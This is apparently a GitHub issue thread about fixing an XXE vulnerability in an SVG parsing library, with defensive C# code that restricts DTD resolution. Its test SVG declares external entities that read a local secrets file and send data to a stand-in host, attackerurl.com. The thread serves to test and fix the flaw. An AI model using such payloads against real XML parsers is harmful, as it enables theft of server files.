Comments (4)
@MarvinPogoda Sorry, there will be a little delay in the packaging. I have started implementing a fix for the XXE vulnerability, which will cover other external/local URLs in the SVG document (per user settings).
The default maintains the DtdProcessing.Parse setting, but only resolves the DTD from the embedded resource, to maintain the validation of SVG documents.
The test SVG is shown below. Hope you can verify this commit with your documents and provide feedback.
```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"[
<!ENTITY xxe SYSTEM "file:///local/path/to/secrets.txt">
<!ENTITY exfil SYSTEM 'http://attackerurl.com/?x=%file;'>
<!ENTITY xeimage SYSTEM 'https://dev.w3.org/SVG/tools/svgweb/samples/svg-files/410.svg'>
<!ENTITY st0 "fill:#BF0D0B;stroke-width:5;">
<!ENTITY st1 "fill:#F8E81F;stroke-width:5;">
<!ENTITY st2 "fill:#F7B71B;stroke-width:5;">
<!ENTITY st3 "fill-rule:nonzero;clip-rule:nonzero;stroke:#000000;stroke-miterlimit:4;">
<!ENTITY st4 "fill:#C5E41E;stroke-width:5;"> ]>
<svg width="422.5pt" height="425pt" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
  <g id="group1" style="&st3;">
    <path style="&st0;" d="M122.5,61.25c0,32.447-26.863,58.75-60,58.75s-60-26.303-60-58.75S29.363,2.5,62.5,2.5s60,26.303,60,58.75z" />
    <path style="&st2;" d="M170,103.75c0,33.828-27.982,61.25-62.5,61.25S45,137.578,45,103.75S72.982,42.5,107.5,42.5S170,69.922,170,103.75z" />
    <path style="&st1;" d="M282.5,190c0,49.706-37.496,90-83.75,90S115, 239.706,115,190s37.496-90,83.75-90s83.75,40.294,83.75,90z" />
    <path style="&st4;" d="M420,316.25c0,58.681-50.368,106.25-112.5,106.25S195,374.931,195,316.25C195,257.57,245.368,210,307.5,210S420,257.57,420,316.25z" />
  </g>
  <text id="secret1" font-size="16" x="0" y="16">&xxe;</text>
  <text id="secret2" font-size="48pt" x="32" y="220">Hello, XXE</text>
  <image x="90" y="180" width="128" height="146" xlink:href="https://dev.w3.org/SVG/tools/svgweb/samples/svg-files/410.svg"/>
</svg>
```
Hey @paulushub ,
thank you for looking into the issue.
I discovered the vulnerability by accident and I'm by far no expert in DTD parsing or XXE attacks. Since there are other attack vectors with DTD parsing, I'm not even sure that blocking external resources will resolve the vulnerability completely.
Since this is an urgent issue for projects with high security standards, could it be possible to get a package version with the changes made in #264, so we can completely turn DTD parsing off?
> Since there are other attack-vectors with dtd-parsing
For SVG, the URL resolution is the only use case I have found so far.
I understand your needs and am working to address it as soon as possible, while resolving it for others by default and without breaking their code. Sorry for the inconvenience. It should be ready by Monday.
For the SVG file, the URL being resolved can be from several sources (DTD, element, image, CSS, font, etc.); DTD is just one of them.
Currently, the only schema provided by the SVG specification is the DTD, and it is the only means to validate the SVG document.
The schema file is packaged as a resource in the DLL (no external access, file/http, is required), so even in these default settings I have made it possible to avoid this issue, for those who may not turn DTD parsing off, as well as making it possible to satisfy your case of manually turning it off.
And also provide the means to turn other URL sources off (or control them).
I am trying to provide the means to finely control it depending on your requirements (for images, for instance, restricting access to local/file URL sources only).
I think I have completed the research on this and am working to complete the implementation.
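The two modes discussed in this thread, as an added example that is not SharpVectors' own code: DTD parsing kept on (DtdProcessing.Parse) but with the W3C SVG 1.1 DTD served only from resources embedded in the assembly and every other URI (file://, any external http://) refused, and the strict mode requested in #264 where any DOCTYPE is rejected outright. The `MyApp.Resources.Dtd.` resource prefix and the `EmbeddedDtdOnlyResolver`/`SafeSvgReader` names are assumptions.

```csharp
// Added example, not SharpVectors' code. Resource names are assumptions.
using System;
using System.IO;
using System.Reflection;
using System.Xml;

// Resolver that answers only for the W3C SVG 1.1 DTD and its modules, from
// embedded resources; a DOCTYPE may still *declare*
//   <!ENTITY xxe SYSTEM "file:///local/path/to/secrets.txt">
// but any attempt to resolve it throws, so no disk or network is touched.
public sealed class EmbeddedDtdOnlyResolver : XmlResolver
{
    private const string SvgDtdBase = "http://www.w3.org/Graphics/SVG/1.1/DTD/";
    // Assumed prefix. svg11.dtd references several .mod files, which must be
    // embedded alongside it or DtdProcessing.Parse will fail on the DOCTYPE.
    private const string ResourcePrefix = "MyApp.Resources.Dtd.";

    public override object GetEntity(Uri absoluteUri, string role, Type ofObjectToReturn)
    {
        string uri = absoluteUri.ToString();
        if (!uri.StartsWith(SvgDtdBase, StringComparison.Ordinal))
        {
            // file:///..., http://attackerurl.com/..., etc. all end here and abort the parse.
            throw new XmlException("External entity resolution is disabled: " + uri);
        }
        string name = ResourcePrefix + uri.Substring(SvgDtdBase.Length); // e.g. ...Dtd.svg11.dtd
        Stream s = Assembly.GetExecutingAssembly().GetManifestResourceStream(name);
        if (s == null)
            throw new XmlException("DTD module is not embedded: " + name);
        return s; // served from the DLL only
    }
}

public static class SafeSvgReader
{
    // allowDtd = false: strict mode (#264), any DOCTYPE is an XmlException.
    // allowDtd = true : keep DTD-based validation, resolving only the embedded DTD.
    public static XmlReader Open(Stream svg, bool allowDtd)
    {
        var settings = new XmlReaderSettings
        {
            DtdProcessing = allowDtd ? DtdProcessing.Parse : DtdProcessing.Prohibit,
            XmlResolver = allowDtd ? new EmbeddedDtdOnlyResolver() : null,
            // Bounds total entity expansion so a DTD cannot be used for a "billion laughs" blow-up.
            MaxCharactersFromEntities = 1024 * 1024,
        };
        return XmlReader.Create(svg, settings);
    }
}
```

Fed the test SVG from the first comment, `Open(stream, true)` parses the DOCTYPE against the embedded DTD and then fails at `&xxe;` when the resolver refuses the file:// URI; `Open(stream, false)` fails as soon as the `<!DOCTYPE` is seen.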
You can visit the SVG section of the GitHub page "XXE Injection", or the link below, to see some examples of this attack:
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XXE%20Injection/README.md#xxe-inside-svg